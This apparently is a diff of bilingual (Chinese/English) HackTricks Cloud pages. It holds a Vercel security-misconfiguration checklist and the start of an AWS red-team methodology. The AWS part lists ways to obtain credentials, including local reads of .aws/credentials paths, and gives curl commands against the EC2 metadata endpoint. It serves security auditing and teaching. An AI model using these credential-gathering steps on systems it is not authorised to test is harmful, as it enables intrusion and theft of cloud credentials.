- **Risk:** Vulnerable to man-in-the-middle (MITM) attacks, compromising data integrity and confidentiality.
- **DNSSEC Implementation**
- **Misconfiguration:** Failing to enable DNSSEC or incorrect DNSSEC settings.
- **Risk:** Increased susceptibility to DNS spoofing and cache poisoning attacks.
- **Environment used per domain**
- **Misconfiguration:** Change the environment used by the domain in production.
- **Risk:** Expose potential secrets or functionalities taht shouldn't be available in production.
---
### 环境
### Environments
**目的:** 定义不同的环境(开发、预览、生产),并具有特定的设置和变量。
**Purpose:** Define different environments (Development, Preview, Production) with specific settings and variables.
#### 安全配置:
#### Security Configurations:
- **环境隔离**
- **错误配置:** 在不同环境之间共享环境变量。
- **风险:** 生产秘密泄露到开发或预览环境中,增加暴露风险。
- **对敏感环境的访问**
- **错误配置:** 允许对生产环境的广泛访问。
- **风险:** 未经授权的更改或访问实时应用程序,导致潜在的停机或数据泄露。
- **Environment Isolation**
- **Misconfiguration:** Sharing environment variables across environments.
- **Risk:** Leakage of production secrets into development or preview environments, increasing exposure.
- **Access to Sensitive Environments**
- **Misconfiguration:** Allowing broad access to production environments.
- **Risk:** Unauthorized changes or access to live applications, leading to potential downtimes or data breaches.
---
### 环境变量
### Environment Variables
**目的:** 管理应用程序使用的特定于环境的变量和秘密。
**Purpose:** Manage environment-specific variables and secrets used by the application.
#### 安全配置:
#### Security Configurations:
- **暴露敏感变量**
- **错误配置:** 用 `NEXT_PUBLIC_` 前缀敏感变量,使其在客户端可访问。
- **风险:** API 密钥、数据库凭据或其他敏感数据暴露给公众,导致数据泄露。
- **敏感禁用**
- **错误配置:** 如果禁用(默认),则可以读取生成的秘密的值。
- **风险:** 意外暴露或未经授权访问敏感信息的可能性增加。
- **共享环境变量**
- **错误配置:** 这些是在团队级别设置的环境变量,可能也包含敏感信息。
- **风险:** 意外暴露或未经授权访问敏感信息的可能性增加。
- **Exposing Sensitive Variables**
- **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
- **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches.
- **Sensitive disabled**
- **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets.
- **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
- **Shared Environment Variables**
- **Misconfiguration:** These are env variables set at Team level and could also contain sensitive information.
- **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
---
### Git
**目的:** 配置 Git 存储库集成、分支保护和部署触发器。
**Purpose:** Configure Git repository integrations, branch protections, and deployment triggers.
#### 安全配置:
#### Security Configurations:
- **忽略构建步骤(TODO**
- **错误配置:** 这个选项似乎允许配置一个 bash 脚本/命令,当在 Github 中推送新提交时执行,这可能允许 RCE
- **风险:** 待定
- **Ignored Build Step (TODO)**
- **Misconfiguration:** It looks like this option allows to configure a bash script/commands that will be executed when a new commit is pushed in Github, which could allow RCE.
- **Risk:** TBD
---
### 集成
### Integrations
**目的:** 连接第三方服务和工具以增强项目功能。
**Purpose:** Connect third-party services and tools to enhance project functionalities.
#### 安全配置:
#### Security Configurations:
- **不安全的第三方集成**
- **错误配置:** 与不受信任或不安全的第三方服务集成。
- **风险:** 通过被破坏的集成引入漏洞、数据泄露或后门。
- **过度授权的集成**
- **错误配置:** 授予集成服务过多的权限。
- **风险:** 未经授权访问项目资源、数据操纵或服务中断。
- **缺乏集成监控**
- **错误配置:** 未能监控和审计第三方集成。
- **风险:** 延迟检测被破坏的集成,增加安全漏洞的潜在影响。
- **Insecure Third-Party Integrations**
- **Misconfiguration:** Integrating with untrusted or insecure third-party services.
- **Risk:** Introduction of vulnerabilities, data leaks, or backdoors through compromised integrations.
- **Over-Permissioned Integrations**
- **Misconfiguration:** Granting excessive permissions to integrated services.
- **Risk:** Unauthorized access to project resources, data manipulation, or service disruptions.
- **Lack of Integration Monitoring**
- **Misconfiguration:** Failing to monitor and audit third-party integrations.
- **Risk:** Delayed detection of compromised integrations, increasing the potential impact of security breaches.
---
### 部署保护
### Deployment Protection
**目的:** 通过各种保护机制确保部署安全,控制谁可以访问和部署到您的环境。
**Purpose:** Secure deployments through various protection mechanisms, controlling who can access and deploy to your environments.
#### 安全配置:
#### Security Configurations:
**Vercel 认证**
**Vercel Authentication**
- **错误配置:** 禁用认证或未强制执行团队成员检查。
- **风险:** 未经授权的用户可以访问部署,导致数据泄露或应用程序滥用。
- **Misconfiguration:** Disabling authentication or not enforcing team member checks.
- **Risk:** Unauthorized users can access deployments, leading to data breaches or application misuse.
**自动化的保护绕过**
**Protection Bypass for Automation**
- **错误配置:** 公开暴露绕过秘密或使用弱秘密。
- **风险:** 攻击者可以绕过部署保护,访问和操纵受保护的部署。
- **Misconfiguration:** Exposing the bypass secret publicly or using weak secrets.
- **Risk:** Attackers can bypass deployment protections, accessing and manipulating protected deployments.
**可共享链接**
**Shareable Links**
- **错误配置:** 不加选择地共享链接或未能撤销过时链接。
- **风险:** 未经授权访问受保护的部署,绕过身份验证和 IP 限制。
- **Misconfiguration:** Sharing links indiscriminately or failing to revoke outdated links.
- **Risk:** Unauthorized access to protected deployments, bypassing authentication and IP restrictions.
**OPTIONS 允许列表**
**OPTIONS Allowlist**
- **错误配置:** 允许过于宽泛的路径或敏感端点。
- **风险:** 攻击者可以利用未保护的路径执行未经授权的操作或绕过安全检查。
- **Misconfiguration:** Allowlisting overly broad paths or sensitive endpoints.
- **Risk:** Attackers can exploit unprotected paths to perform unauthorized actions or bypass security checks.
**密码保护**
**Password Protection**
- **错误配置:** 使用弱密码或不安全地共享密码。
- **风险:** 如果密码被猜测或泄露,可能导致未经授权访问部署。
- **注意:** 在 **Pro** 计划中作为 **高级部署保护** 的一部分提供,额外收费 $150/月。
- **Misconfiguration:** Using weak passwords or sharing them insecurely.
- **Risk:** Unauthorized access to deployments if passwords are guessed or leaked.
- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month.
**部署保护例外**
**Deployment Protection Exceptions**
- **错误配置:** 不小心将生产或敏感域添加到例外列表。
- **风险:** 关键部署暴露给公众,导致数据泄露或未经授权访问。
- **注意:** 在 **Pro** 计划中作为 **高级部署保护** 的一部分提供,额外收费 $150/月。
- **Misconfiguration:** Adding production or sensitive domains to the exception list inadvertently.
- **Risk:** Exposure of critical deployments to the public, leading to data leaks or unauthorized access.
- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month.
**受信任的 IP**
**Trusted IPs**
- **错误配置:** 不正确地指定 IP 地址或 CIDR 范围。
- **风险:** 合法用户被阻止或未经授权的 IP 获得访问。
- **注意:** 在 **Enterprise** 计划中提供。
- **Misconfiguration:** Incorrectly specifying IP addresses or CIDR ranges.
- **Risk:** Legitimate users being blocked or unauthorized IPs gaining access.
- **Note:** Available on the **Enterprise** plan.
---
### 函数
### Functions
**目的:** 配置无服务器函数,包括运行时设置、内存分配和安全策略。
**Purpose:** Configure serverless functions, including runtime settings, memory allocation, and security policies.
#### 安全配置:
#### Security Configurations:
- ****
- **Nothing**
---
### 数据缓存
### Data Cache
**目的:** 管理缓存策略和设置,以优化性能和控制数据存储。
**Purpose:** Manage caching strategies and settings to optimize performance and control data storage.
#### 安全配置:
#### Security Configurations:
- **清除缓存**
- **错误配置:** 允许删除所有缓存。
- **风险:** 未经授权的用户删除缓存,导致潜在的 DoS
- **Purge Cache**
- **Misconfiguration:** It allows to delete all the cache.
- **Risk:** Unauthorized users deleting the cache leading to a potential DoS.
---
### 定时任务
### Cron Jobs
**目的:** 安排自动化任务和脚本在指定时间间隔运行。
**Purpose:** Schedule automated tasks and scripts to run at specified intervals.
#### 安全配置:
#### Security Configurations:
- **禁用定时任务**
- **错误配置:** 允许禁用代码中声明的定时任务。
- **风险:** 服务潜在中断(取决于定时任务的目的)
- **Disable Cron Job**
- **Misconfiguration:** It allows to disable cron jobs declared inside the code
- **Risk:** Potential interruption of the service (depending on what the cron jobs were meant for)
---
### 日志排水
### Log Drains
**目的:** 配置外部日志服务以捕获和存储应用程序日志以进行监控和审计。
**Purpose:** Configure external logging services to capture and store application logs for monitoring and auditing.
#### 安全配置:
#### Security Configurations:
- 无(由团队设置管理)
- Nothing (managed from teams settings)
---
### 安全
### Security
**目的:** 各种影响项目访问、源保护等的安全相关设置的中央中心。
**Purpose:** Central hub for various security-related settings affecting project access, source protection, and more.
#### 安全配置:
#### Security Configurations:
**构建日志和源保护**
**Build Logs and Source Protection**
- **错误配置:** 禁用保护或公开 `/logs` `/src` 路径。
- **风险:** 未经授权访问构建日志和源代码,导致信息泄露和潜在漏洞利用。
- **Misconfiguration:** Disabling protection or exposing `/logs` and `/src` paths publicly.
- **Risk:** Unauthorized access to build logs and source code, leading to information leaks and potential exploitation of vulnerabilities.
**Git Fork 保护**
**Git Fork Protection**
- **错误配置:** 允许未经授权的拉取请求而没有适当的审查。
- **风险:** 恶意代码可能被合并到代码库中,引入漏洞或后门。
- **Misconfiguration:** Allowing unauthorized pull requests without proper reviews.
- **Risk:** Malicious code can be merged into the codebase, introducing vulnerabilities or backdoors.
**使用 OIDC 联合身份验证的安全后端访问**
**Secure Backend Access with OIDC Federation**
- **错误配置:** 错误设置 OIDC 参数或使用不安全的发行者 URL
- **风险:** 通过错误的身份验证流程未经授权访问后端服务。
- **Misconfiguration:** Incorrectly setting up OIDC parameters or using insecure issuer URLs.
- **Risk:** Unauthorized access to backend services through flawed authentication flows.
**部署保留策略**
**Deployment Retention Policy**
- **错误配置:** 设置保留期限过短(丢失部署历史)或过长(不必要的数据保留)。
- **风险:** 在需要时无法执行回滚,或由于旧部署增加数据暴露风险。
- **Misconfiguration:** Setting retention periods too short (losing deployment history) or too long (unnecessary data retention).
- **Risk:** Inability to perform rollbacks when needed or increased risk of data exposure from old deployments.
**最近删除的部署**
**Recently Deleted Deployments**
- **错误配置:** 未监控已删除的部署或仅依赖自动删除。
- **风险:** 丢失关键部署历史,妨碍审计和回滚。
- **Misconfiguration:** Not monitoring deleted deployments or relying solely on automated deletions.
- **Risk:** Loss of critical deployment history, hindering audits and rollbacks.
---
### 高级
### Advanced
**目的:** 访问额外的项目设置,以微调配置和增强安全性。
**Purpose:** Access to additional project settings for fine-tuning configurations and enhancing security.
#### 安全配置:
#### Security Configurations:
**目录列表**
**Directory Listing**
- **错误配置:** 启用目录列表允许用户在没有索引文件的情况下查看目录内容。
- **风险:** 暴露敏感文件、应用程序结构和潜在攻击入口。
- **Misconfiguration:** Enabling directory listing allows users to view directory contents without an index file.
- **Risk:** Exposure of sensitive files, application structure, and potential entry points for attacks.
---
## 项目防火墙
## Project Firewall
### 防火墙
### Firewall
#### 安全配置:
#### Security Configurations:
**启用攻击挑战模式**
**Enable Attack Challenge Mode**
- **错误配置:** 启用此功能提高了 Web 应用程序对 DoS 的防御,但以可用性为代价。
- **风险:** 潜在的用户体验问题。
- **Misconfiguration:** Enabling this improves the defenses of the web application against DoS but at the cost of usability
- **Risk:** Potential user experience problems.
### 自定义规则和 IP 阻止
### Custom Rules & IP Blocking
- **错误配置:** 允许解除/阻止流量。
- **风险:** 潜在的 DoS 允许恶意流量或阻止良性流量。
- **Misconfiguration:** Allows to unblock/block traffic
- **Risk:** Potential DoS allowing malicious traffic or blocking benign traffic
---
## 项目部署
## Project Deployment
### 源代码
### Source
- **错误配置:** 允许访问读取应用程序的完整源代码。
- **风险:** 潜在暴露敏感信息。
- **Misconfiguration:** Allows access to read the complete source code of the application
- **Risk:** Potential exposure of sensitive information
### 偏差保护
### Skew Protection
- **错误配置:** 此保护确保客户端和服务器应用程序始终使用相同版本,以避免客户端使用与服务器不同的版本而导致的不同步。
- **风险:** 禁用此功能(如果启用)可能导致未来新部署中的 DoS 问题。
- **Misconfiguration:** This protection ensures the client and server application are always using the same version so there is no desynchronizations were the client uses a different version from the server and therefore they don't understand each other.
- **Risk:** Disabling this (if enabled) could cause DoS problems in new deployments in the future
---
## 团队设置
## Team Settings
### 一般
### General
#### 安全配置:
#### Security Configurations:
- **转移**
- **错误配置:** 允许将所有项目转移到另一个团队。
- **风险:** 攻击者可能会窃取项目。
- **删除项目**
- **错误配置:** 允许删除团队及其所有项目。
- **风险:** 删除项目。
- **Transfer**
- **Misconfiguration:** Allows to transfer all the projects to another team
- **Risk:** An attacker could steal the projects
- **Delete Project**
- **Misconfiguration:** Allows to delete the team with all the projects
- **Risk:** Delete the projects
---
### 计费
### Billing
#### 安全配置:
#### Security Configurations:
- **速度洞察成本限制**
- **错误配置:** 攻击者可能会增加此数字。
- **风险:** 成本增加。
- **Speed Insights Cost Limit**
- **Misconfiguration:** An attacker could increase this number
- **Risk:** Increased costs
---
### 成员
### Members
#### 安全配置:
#### Security Configurations:
- **添加成员**
- **错误配置:** 攻击者可能会通过邀请他控制的帐户来维持持久性。
- **风险:** 攻击者持久性。
- **角色**
- **错误配置:** 授予不需要的人员过多权限,增加 Vercel 配置的风险。检查所有可能的角色在 [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles)
- **风险:** 增加 Vercel 团队的暴露。
- **Add members**
- **Misconfiguration:** An attacker could maintain persitence inviting an account he control
- **Risk:** Attacker persistence
- **Roles**
- **Misconfiguration:** Granting too many permissions to people that doesn't need it increases the risk of the vercel configuration. Check all the possible roles in [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles)
- **Risk**: Increate the exposure of the Vercel Team
---
### 访问组
### Access Groups
在 Vercel 中,**访问组**是一个项目和团队成员的集合,具有预定义的角色分配,能够在多个项目之间实现集中和简化的访问管理。
An **Access Group** in Vercel is a collection of projects and team members with predefined role assignments, enabling centralized and streamlined access management across multiple projects.
**潜在错误配置:**
**Potential Misconfigurations:**
- **过度授权成员:** 分配的角色权限超过必要,导致未经授权的访问或操作。
- **不当角色分配:** 错误分配与团队成员职责不符的角色,导致特权升级。
- **缺乏项目隔离:** 未能分离敏感项目,允许比预期更广泛的访问。
- **组管理不足:** 未定期审查或更新访问组,导致过时或不当的访问权限。
- **角色定义不一致:** 在不同访问组中使用不一致或不清晰的角色定义,导致混淆和安全漏洞。
- **Over-Permissioning Members:** Assigning roles with more permissions than necessary, leading to unauthorized access or actions.
- **Improper Role Assignments:** Incorrectly assigning roles that do not align with team members' responsibilities, causing privilege escalation.
- **Lack of Project Segregation:** Failing to separate sensitive projects, allowing broader access than intended.
- **Insufficient Group Management:** Not regularly reviewing or updating Access Groups, resulting in outdated or inappropriate access permissions.
- **Inconsistent Role Definitions:** Using inconsistent or unclear role definitions across different Access Groups, leading to confusion and security gaps.
---
### 日志排水
### Log Drains
#### 安全配置:
#### Security Configurations:
- **向第三方的日志排水:**
- **错误配置:** 攻击者可能会配置日志排水以窃取日志。
- **风险:** 部分持久性。
- **Log Drains to third parties:**
- **Misconfiguration:** An attacker could configure a Log Drain to steal the logs
- **Risk:** Partial persistence
---
### 安全与隐私
### Security & Privacy
#### 安全配置:
#### Security Configurations:
- **团队电子邮件域:** 配置后,此设置会自动邀请以指定域(例如 `mydomain.com`)结尾的 Vercel 个人帐户在注册时和仪表板上加入您的团队。
- **错误配置:**
- 指定错误的电子邮件域或在团队电子邮件域设置中拼写错误的域。
- 使用常见电子邮件域(例如 `gmail.com``hotmail.com`)而不是公司特定域。
- **风险:**
- **未经授权的访问:** 来自意外域的用户可能会收到加入您团队的邀请。
- **数据暴露:** 敏感项目信息可能暴露给未经授权的个人。
- **受保护的 Git 范围:** 允许您为团队添加最多 5 个 Git 范围,以防止其他 Vercel 团队从受保护的范围中部署存储库。多个团队可以指定相同的范围,允许两个团队访问。
- **错误配置:** 未将关键 Git 范围添加到受保护列表。
- **风险:**
- **未经授权的部署:** 其他团队可能未经授权从您组织的 Git 范围中部署存储库。
- **知识产权暴露:** 专有代码可能被部署并在您的团队之外访问。
- **环境变量政策:** 强制执行团队环境变量的创建和编辑政策。具体而言,您可以强制所有环境变量作为 **敏感环境变量** 创建,这只能由 Vercel 的部署系统解密。
- **错误配置:** 保持对敏感环境变量的强制执行禁用。
- **风险:**
- **秘密暴露:** 环境变量可能被未经授权的团队成员查看或编辑。
- **数据泄露:** 敏感信息如 API 密钥和凭据可能被泄露。
- **审计日志:** 提供团队活动的导出,最长可达 90 天。审计日志有助于监控和跟踪团队成员执行的操作。
- **错误配置:**\
授予未经授权的团队成员访问审计日志的权限。
- **风险:**
- **隐私侵犯:** 敏感用户活动和数据的暴露。
- **篡改日志:** 恶意行为者可能会更改或删除日志以掩盖其踪迹。
- **SAML 单点登录:** 允许自定义 SAML 身份验证和目录同步以便与身份提供者IdP集成实现集中身份验证和用户管理。
- **错误配置:** 攻击者可能会通过设置 SAML 参数(如实体 IDSSO URL 或证书指纹)来后门团队。
- **风险:** 维持持久性。
- **IP 地址可见性:** 控制 IP 地址是否在监控查询和日志排水中显示,这在某些数据保护法律下可能被视为个人信息。
- **错误配置:** 在没有必要的情况下保持 IP 地址可见性启用。
- **风险:**
- **隐私侵犯:** 不符合数据保护法规(如 GDPR)。
- **法律后果:** 由于处理个人数据不当而可能面临罚款和处罚。
- **IP 阻止:** 允许配置 Vercel 应该阻止请求的 IP 地址和 CIDR 范围。被阻止的请求不会计入您的账单。
- **错误配置:** 可能被攻击者滥用以允许恶意流量或阻止合法流量。
- **风险:**
- **对合法用户的服务拒绝:** 阻止有效用户或合作伙伴的访问。
- **操作中断:** 某些地区或客户的服务可用性丧失。
- **Team Email Domain:** When configured, this setting automatically invites Vercel Personal Accounts with email addresses ending in the specified domain (e.g., `mydomain.com`) to join your team upon signup and on the dashboard.
- **Misconfiguration:**
- Specifying the wrong email domain or a misspelled domain in the Team Email Domain setting.
- Using a common email domain (e.g., `gmail.com`, `hotmail.com`) instead of a company-specific domain.
- **Risks:**
- **Unauthorized Access:** Users with email addresses from unintended domains may receive invitations to join your team.
- **Data Exposure:** Potential exposure of sensitive project information to unauthorized individuals.
- **Protected Git Scopes:** Allows you to add up to 5 Git scopes to your team to prevent other Vercel teams from deploying repositories from the protected scope. Multiple teams can specify the same scope, allowing both teams access.
- **Misconfiguration:** Not adding critical Git scopes to the protected list.
- **Risks:**
- **Unauthorized Deployments:** Other teams may deploy repositories from your organization's Git scopes without authorization.
- **Intellectual Property Exposure:** Proprietary code could be deployed and accessed outside your team.
- **Environment Variable Policies:** Enforces policies for the creation and editing of the team's environment variables. Specifically, you can enforce that all environment variables are created as **Sensitive Environment Variables**, which can only be decrypted by Vercel's deployment system.
- **Misconfiguration:** Keeping the enforcement of sensitive environment variables disabled.
- **Risks:**
- **Exposure of Secrets:** Environment variables may be viewed or edited by unauthorized team members.
- **Data Breach:** Sensitive information like API keys and credentials could be leaked.
- **Audit Log:** Provides an export of the team's activity for up to the last 90 days. Audit logs help in monitoring and tracking actions performed by team members.
- **Misconfiguration:**\
Granting access to audit logs to unauthorized team members.
- **Risks:**
- **Privacy Violations:** Exposure of sensitive user activities and data.
- **Tampering with Logs:** Malicious actors could alter or delete logs to cover their tracks.
- **SAML Single Sign-On:** Allows customization of SAML authentication and directory syncing for your team, enabling integration with an Identity Provider (IdP) for centralized authentication and user management.
- **Misconfiguration:** An attacker could backdoor the Team setting up SAML parameters such as Entity ID, SSO URL, or certificate fingerprints.
- **Risk:** Maintain persistence
- **IP Address Visibility:** Controls whether IP addresses, which may be considered personal information under certain data protection laws, are displayed in Monitoring queries and Log Drains.
- **Misconfiguration:** Leaving IP address visibility enabled without necessity.
- **Risks:**
- **Privacy Violations:** Non-compliance with data protection regulations like GDPR.
- **Legal Repercussions:** Potential fines and penalties for mishandling personal data.
- **IP Blocking:** Allows the configuration of IP addresses and CIDR ranges that Vercel should block requests from. Blocked requests do not contribute to your billing.
- **Misconfiguration:** Could be abused by an attacker to allow malicious traffic or block legit traffic.
- **Risks:**
- **Service Denial to Legitimate Users:** Blocking access for valid users or partners.
- **Operational Disruptions:** Loss of service availability for certain regions or clients.
---
### 安全计算
### Secure Compute
**Vercel 安全计算** 通过建立具有专用 IP 地址的隔离网络,启用 Vercel 函数与后端环境(例如数据库)之间的安全、私密连接。这消除了公开暴露后端服务的需要,增强了安全性、合规性和隐私。
**Vercel Secure Compute** enables secure, private connections between Vercel Functions and backend environments (e.g., databases) by establishing isolated networks with dedicated IP addresses. This eliminates the need to expose backend services publicly, enhancing security, compliance, and privacy.
#### **潜在错误配置和风险**
#### **Potential Misconfigurations and Risks**
1. **错误的 AWS 区域选择**
- **错误配置:** 为安全计算网络选择的 AWS 区域与后端服务的区域不匹配。
- **风险:** 延迟增加、潜在的数据驻留合规性问题和性能下降。
2. **重叠的 CIDR 块**
- **错误配置:** 选择与现有 VPC 或其他网络重叠的 CIDR 块。
- **风险:** 网络冲突导致连接失败、未经授权访问或网络之间的数据泄露。
3. **不当的 VPC 对等配置**
- **错误配置:** 错误设置 VPC 对等(例如,错误的 VPC ID、未完成的路由表更新
- **风险:** 通过错误的身份验证流程未经授权访问后端基础设施、连接失败和潜在的数据泄露。
4. **过多的项目分配**
- **错误配置:** 在没有适当隔离的情况下将多个项目分配给单个安全计算网络。
- **风险:** 共享 IP 暴露增加攻击面,可能导致被破坏的项目影响其他项目。
5. **不充分的 IP 地址管理**
- **错误配置:** 未能适当管理或轮换专用 IP 地址。
- **风险:** IP 欺骗、跟踪漏洞和如果 IP 与恶意活动相关联则可能被列入黑名单。
6. **不必要地包含构建容器**
- **错误配置:** 在构建期间不需要后端访问时将构建容器添加到安全计算网络。
- **风险:** 扩大攻击面、增加配置延迟和不必要的网络资源消耗。
7. **未能安全处理绕过秘密**
- **错误配置:** 暴露或错误处理用于绕过部署保护的秘密。
- **风险:** 未经授权访问受保护的部署,允许攻击者操纵或部署恶意代码。
8. **忽视区域故障转移配置**
- **错误配置:** 未设置被动故障转移区域或错误配置故障转移设置。
- **风险:** 在主要区域故障期间服务停机,导致可用性降低和潜在的数据不一致。
9. **超过 VPC 对等连接限制**
- **错误配置:** 尝试建立超过允许限制的 VPC 对等连接(例如,超过 50 个连接)。
- **风险:** 无法安全连接必要的后端服务,导致部署失败和操作中断。
10. **不安全的网络设置**
- **错误配置:** 弱防火墙规则、缺乏加密或安全计算网络内的不当网络分段。
- **风险:** 数据拦截、未经授权访问后端服务和增加攻击的脆弱性。
1. **Incorrect AWS Region Selection**
- **Misconfiguration:** Choosing an AWS region for the Secure Compute network that doesn't match the backend services' region.
- **Risk:** Increased latency, potential data residency compliance issues, and degraded performance.
2. **Overlapping CIDR Blocks**
- **Misconfiguration:** Selecting CIDR blocks that overlap with existing VPCs or other networks.
- **Risk:** Network conflicts leading to failed connections, unauthorized access, or data leakage between networks.
3. **Improper VPC Peering Configuration**
- **Misconfiguration:** Incorrectly setting up VPC peering (e.g., wrong VPC IDs, incomplete route table updates).
- **Risk:** Unauthorized access to backend infrastructure, failed secure connections, and potential data breaches.
4. **Excessive Project Assignments**
- **Misconfiguration:** Assigning multiple projects to a single Secure Compute network without proper isolation.
- **Risk:** Shared IP exposure increases the attack surface, potentially allowing compromised projects to affect others.
5. **Inadequate IP Address Management**
- **Misconfiguration:** Failing to manage or rotate dedicated IP addresses appropriately.
- **Risk:** IP spoofing, tracking vulnerabilities, and potential blacklisting if IPs are associated with malicious activities.
6. **Including Build Containers Unnecessarily**
- **Misconfiguration:** Adding build containers to the Secure Compute network when backend access isn't required during builds.
- **Risk:** Expanded attack surface, increased provisioning delays, and unnecessary consumption of network resources.
7. **Failure to Securely Handle Bypass Secrets**
- **Misconfiguration:** Exposing or mishandling secrets used to bypass deployment protections.
- **Risk:** Unauthorized access to protected deployments, allowing attackers to manipulate or deploy malicious code.
8. **Ignoring Region Failover Configurations**
- **Misconfiguration:** Not setting up passive failover regions or misconfiguring failover settings.
- **Risk:** Service downtime during primary region outages, leading to reduced availability and potential data inconsistency.
9. **Exceeding VPC Peering Connection Limits**
- **Misconfiguration:** Attempting to establish more VPC peering connections than the allowed limit (e.g., exceeding 50 connections).
- **Risk:** Inability to connect necessary backend services securely, causing deployment failures and operational disruptions.
10. **Insecure Network Settings**
- **Misconfiguration:** Weak firewall rules, lack of encryption, or improper network segmentation within the Secure Compute network.
- **Risk:** Data interception, unauthorized access to backend services, and increased vulnerability to attacks.
---
### 环境变量
### Environment Variables
**目的:** 管理所有项目使用的特定于环境的变量和秘密。
**Purpose:** Manage environment-specific variables and secrets used by all the projects.
#### 安全配置:
#### Security Configurations:
- **暴露敏感变量**
- **错误配置:** 用 `NEXT_PUBLIC_` 前缀敏感变量,使其在客户端可访问。
- **风险:** API 密钥、数据库凭据或其他敏感数据暴露给公众,导致数据泄露。
- **敏感禁用**
- **错误配置:** 如果禁用(默认),则可以读取生成的秘密的值。
- **风险:** 意外暴露或未经授权访问敏感信息的可能性增加。
- **Exposing Sensitive Variables**
- **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
- **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches.
- **Sensitive disabled**
- **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets.
- **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
{{#include ../banners/hacktricks-training.md}}

View File

@@ -2,17 +2,17 @@
{{#include ../../banners/hacktricks-training.md}}
## 基本信息
## Basic Information
**在开始对** AWS **环境进行渗透测试之前,您需要了解一些关于 AWS 工作原理的基本知识,以帮助您理解需要做什么、如何查找错误配置以及如何利用它们。**
**Before start pentesting** an **AWS** environment there are a few **basics things you need to know** about how AWS works to help you understand what you need to do, how to find misconfigurations and how to exploit them.
组织层级、IAM 和其他基本概念等概念在以下内容中进行了说明:
Concepts such as organization hierarchy, IAM and other basic concepts are explained in:
{{#ref}}
aws-basic-information/
{{#endref}}
## 学习实验室
## Labs to learn
- [https://github.com/RhinoSecurityLabs/cloudgoat](https://github.com/RhinoSecurityLabs/cloudgoat)
- [https://github.com/BishopFox/iam-vulnerable](https://github.com/BishopFox/iam-vulnerable)
@@ -22,49 +22,49 @@ aws-basic-information/
- [http://flaws.cloud/](http://flaws.cloud/)
- [http://flaws2.cloud/](http://flaws2.cloud/)
模拟攻击的工具:
Tools to simulate attacks:
- [https://github.com/Datadog/stratus-red-team/](https://github.com/Datadog/stratus-red-team/)
- [https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main](https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main)
## AWS 渗透测试/红队方法论
## AWS Pentester/Red Team Methodology
为了审计 AWS 环境,了解以下内容非常重要:哪些 **服务正在使用**,什么 **被暴露**,谁对什么 **有访问权限**,以及内部 AWS 服务与 **外部服务** 是如何连接的。
In order to audit an AWS environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal AWS services an **external services** connected.
从红队的角度来看,**攻陷 AWS 环境的第一步**是设法获取一些 **凭证**。以下是一些获取凭证的想法:
From a Red Team point of view, the **first step to compromise an AWS environment** is to manage to obtain some **credentials**. Here you have some ideas on how to do that:
- **泄露** github(或类似平台)- OSINT
- **社交** 工程
- **密码** 重用(密码泄露)
- AWS 托管应用程序中的漏洞
- [**服务器端请求伪造**](https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html) 访问元数据端点
- **本地文件读取**
- `/home/USERNAME/.aws/credentials`
- `C:\Users\USERNAME\.aws\credentials`
- 第三方 **被攻破**
- **内部** 员工
- [**Cognito** ](aws-services/aws-cognito-enum/index.html#cognito)凭证
- **Leaks** in github (or similar) - OSINT
- **Social** Engineering
- **Password** reuse (password leaks)
- Vulnerabilities in AWS-Hosted Applications
- [**Server Side Request Forgery**](https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html) with access to metadata endpoint
- **Local File Read**
- `/home/USERNAME/.aws/credentials`
- `C:\Users\USERNAME\.aws\credentials`
- 3rd parties **breached**
- **Internal** Employee
- [**Cognito** ](aws-services/aws-cognito-enum/index.html#cognito)credentials
或者通过 **攻陷一个未认证的服务**
Or by **compromising an unauthenticated service** exposed:
{{#ref}}
aws-unauthenticated-enum-access/
{{#endref}}
或者如果您正在进行 **审查**,您可以直接 **请求凭证**,使用这些角色:
Or if you are doing a **review** you could just **ask for credentials** with these roles:
{{#ref}}
aws-permissions-for-a-pentest.md
{{#endref}}
> [!NOTE]
> 在您成功获取凭证后,您需要知道 **这些凭证属于谁**,以及 **他们可以访问什么**,因此您需要进行一些基本的枚举:
> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
## 基本枚举
## Basic Enumeration
### SSRF
如果您在 AWS 内部的机器上发现了 SSRF请查看此页面以获取技巧
If you found a SSRF in a machine inside AWS check this page for tricks:
{{#ref}}
https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html
@@ -72,7 +72,8 @@ https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/
### Whoami
您需要了解的第一件事是您是谁(您所在的账户以及有关 AWS 环境的其他信息):
One of the first things you need to know is who you are (in where account you are in other info about the AWS env):
```bash
# Easiest way, but might be monitored?
aws sts get-caller-identity
@@ -88,9 +89,10 @@ aws sns publish --topic-arn arn:aws:sns:us-east-1:*account id*:aaa --message aaa
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document
```
> [!CAUTION]
> 注意,公司可能会使用 **canary tokens** 来识别 **令牌被盗用和使用** 的情况。在使用令牌之前,建议检查该令牌是否为 canary token。\
